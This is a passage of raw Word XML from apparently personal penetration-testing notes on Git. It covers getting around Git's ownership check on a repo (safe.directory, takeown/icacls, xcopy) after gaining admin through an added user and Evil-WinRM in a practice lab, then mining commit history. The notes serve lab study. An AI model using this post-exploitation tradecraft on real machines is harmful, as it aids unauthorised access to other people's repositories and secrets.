        <w:t xml:space="preserve">/local/directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with "." to move files to current directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003202">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003203">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003204">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205">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003206">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003207">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hxuokffjarqm" w:id="443"/>
      <w:bookmarkEnd w:id="443"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003208">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003209">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uf6dojytz2w9" w:id="444"/>
      <w:bookmarkEnd w:id="444"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to access git repo that is not owned by you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.249 machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw a directory with a hidden .git directory, meaning that it's a git repo. But when we tried running</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> git status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we got this error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*Evil-WinRM* PS C:\staging&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git.exe : fatal: detected dubious ownership in repository at 'C:/staging'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    + CategoryInfo          : NotSpecified: (fatal: detected...at 'C:/staging':String) [], RemoteException</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    + FullyQualifiedErrorId : NativeCommandError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003210">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'C:/staging/.git' is owned by:  'S-1-5-21-464543310-226837244-3834982083-1003'but the current user is:  'S-1-5-21-464543310-226837244-3834982083-1005'To add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003211">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003212">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because we got admin by adding an admin user and logging in via winrm. So, this new admin user is not the owner of the git repo and can't access it. So, we have multiple ways around this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003213">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003214">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003215">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Tell Git this repo is safe (the only method I've tried so far) (no privileges needed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003216">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003217">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you just want to use the repo as-is, you can whitelist the path:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003218">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git config --global --add safe.directory C:/staging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now Git will trust that repo regardless of ownership.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Take ownership of the repo (high privileges needed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you’d rather fix ownership to match your current user (instead of bypassing the check), you can:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">takeown /F C:\staging\.git /R /D Y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">icacls C:\staging\.git /setowner "USERNAME" /T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "USERNAME" with the account you’re in with Evil-WinRM. This way the repo actually belongs to you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003220">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003221">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Copy the repo out (quick workaround) (no privileges needed)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003222">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If permissions are messy, another trick is just:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003223">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xcopy C:\staging C:\Users\Public\staging /E /H /I</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003224">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd C:\Users\Public\staging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003225">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003226">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now it’s under your user profile and Git won’t complain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003227">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003228">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003229">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the Relia Writeup for more in-depth information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git show 8b430c17c16e6c0515e49c4eafdd129f719fde74 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003230">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is like git log and git show combined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003231">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It shows all the logs and also all the changes between each log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="669"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then scroll through the output, since it's a lot of output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003233">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003234">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l5e9mw89uuuk" w:id="445"/>
      <w:bookmarkEnd w:id="445"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Really complex git example </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003235">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003236">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A really complex example of git was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1100">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hunit</w:t>
